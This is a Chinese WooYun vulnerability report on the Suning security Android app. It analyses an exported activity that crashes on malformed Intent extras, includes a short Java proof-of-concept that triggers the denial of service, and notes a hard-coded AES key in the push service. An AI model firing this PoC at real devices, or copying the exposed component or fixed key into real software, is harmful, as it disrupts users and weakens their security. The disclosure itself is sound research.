当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142647

漏洞标题:苏宁安全app拒绝服务一枚

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: hh88

提交时间:2015-09-23 14:14

修复时间:2015-12-22 15:16

公开时间:2015-12-22 15:16

漏洞类型:拒绝服务

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-23: 细节已通知厂商并且等待厂商处理中
2015-09-23: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-11-17: 细节向核心白帽子及相关领域专家公开
2015-11-27: 细节向普通白帽子公开
2015-12-07: 细节向实习白帽子公开
2015-12-22: 细节向公众公开

简要描述:

Android苏宁安全是一款免费的手机安全软件,集手机防盗、防垃圾短信,防骚扰电话功能于一身,为您带来全方位。。。。。。。。

详细说明:

由于组件com.suning.phonesecurity.firewall.NameEditorActivity暴露

protected void onCreate(Bundle arg4) {
        super.onCreate(arg4);
        this.n = this.getIntent();
        if(this.n.getData() == null) {
            this.n.setData(ak.a);
        }
        this.m = this.n.getAction();
        this.e = this.n.getStringExtra("blocktype");
        if(this.e == null) {
            a.a("NameEditor", "No block type, exiting");
            this.finish();
            return;
        }
        this.o = this.n.getStringExtra(this.e);
        a.a("NameEditor", "mBlocktype:" + this.e);
        ActionBar v0 = this.getActionBar();
        if(v0 != null) {
            v0.setDisplayOptions(12);
        }
        if(this.e.equals(NameEditorActivity.a[1])) {
            goto label_50;
        }
        if(this.e.equals(NameEditorActivity.a[3])) {
            goto label_50;
        }
        if(this.e.equals(NameEditorActivity.a[0])) {
            goto label_83;
        }
        if(!this.e.equals(NameEditorActivity.a[2])) {
            this.setContentView(2130968595);
            this.d = this.findViewById(2131427471);
            this.d.addTextChangedListener(this.q);
            if(!TextUtils.isEmpty(this.o)) {
                this.d.setText(this.o);
            }
            this.j = this.findViewById(2131427474);
            this.k = this.findViewById(2131427472);
            this.l = this.findViewById(2131427473);
        }
        else {
        label_83:  // R.layout.activity_number_editor
            this.setContentView(2130968597);
            this.d = this.findViewById(2131427479);
            this.d.addTextChangedListener(this.q);
            this.d.addTextChangedListener(new PhoneNumberFormattingTextWatcher());
            goto label_58;
        label_50:  // R.layout.activity_patternnum_editor
            this.setContentView(2130968599);
            this.d = this.findViewById(2131427488);
            this.d.addTextChangedListener(this.q);
        }
    label_58:
        if(!"android.intent.action.INSERT".equals(this.m) && !"android.intent.action.EDIT".equals(this
                .m)) {
            a.a("NameEditor", "Unknown action, exiting");
            this.finish();
            return;
        }
        if(arg4 != null) {
            this.f = arg4.getString("origContent");
            this.g = Boolean.valueOf(arg4.getBoolean("origPattern"));
            this.h = Boolean.valueOf(arg4.getBoolean("origCall"));
            this.i = Boolean.valueOf(arg4.getBoolean("origSms"));
        }
    }
其中这三个转换  this.g = Boolean.valueOf(arg4.getBoolean("origPattern"));
            this.h = Boolean.valueOf(arg4.getBoolean("origCall"));
            this.i = Boolean.valueOf(arg4.getBoolean("origSms"));
传入异常数据,即可产生拒绝服务


另外

package com.suning.cloud.push.pushservice.b;
  private b(Context arg7) {
        Iterator v2_1;
        super();
        this.a = new ArrayList();
        this.e = new HashMap();
        this.d = arg7.getApplicationContext();
        b.b(this.d);
        String v1 = this.d.getSharedPreferences(String.valueOf(this.d.getPackageName()) + ".push_sync", 
                1).getString("content", "");
        if(!TextUtils.isEmpty(((CharSequence)v1))) {
            try {
                byte[] v1_2 = Base64.decode(v1.getBytes(), 0);
                SecretKeySpec v4 = new SecretKeySpec("9876543210123456".getBytes(), "AES");
                Cipher v3 = Cipher.getInstance("AES");
                v3.init(2, ((Key)v4));
                String v2 = new String(v3.doFinal(v1_2));
                if(h.f()) {
                    Log.i(b.b, "init : " + v2);
                }
固定秘钥是很危险的。

漏洞证明:

Screenshot_2015-09-21-16-54-10.png

public static void NameEditorActivity_poc(Context context){
		 Intent intent=new Intent();
			intent.setClassName("com.suning.phonesecurity", "com.suning.phonesecurity.firewall.NameEditorActivity");
			intent.setAction("android.intent.action.INSERT");
			intent.putExtra("blocktype", "whitelist");
			intent.putExtra("whitelist", "xxoo");
			
			intent.putExtra("origCall", "xxxx");
			context.startActivity(intent);
	 }


修复方案:

加trycatch
就冲着 “感谢提交,移动客户端拒绝服务漏洞一律按照200元礼品卡计算”来的。

版权声明:转载请注明来源 hh88@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-09-23 15:14

厂商回复:

感谢提交,请将安全漏洞提交至http://

最新状态:

暂无

漏洞评价:

评价

  1. 2015-09-23 16:04 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:63 | 潜心代码审计。)

    感谢提交,请将安全漏洞提交至http://

  2. 2015-09-24 09:45 | hh88 ( 实习白帽子 | Rank:35 漏洞数:5 | Android开发与安全测试,web安全测试。)

    what??

  3. 2015-09-25 21:11 | 云云 ( 路人 | Rank:0 漏洞数:2 | 我就一个马甲还要填信息?)

    感谢提交,请将安全漏洞提交至http://